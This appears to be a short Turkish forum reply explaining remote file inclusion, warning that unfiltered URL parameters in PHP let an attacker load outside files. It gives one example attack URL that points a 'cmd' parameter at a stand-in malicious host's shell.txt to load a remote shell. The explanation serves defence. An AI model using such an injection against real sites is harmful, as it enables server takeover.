rfi demek istedi sanırım arkadaş, remote file inclusion.

url den string olarak aldığınız değişkenleri filtrelemiyorsanız, rfi saldırısına maruz kalabilirsiniz.

site.com/index.php?cmd=include.php
bu şekilde include.php dosyasını çağırıyorsanız ve filtreleme yapmazsınız
site.com/index.php?cmd=zararlisite.com/shell.txt
şeklinde bir saldırı olabilir.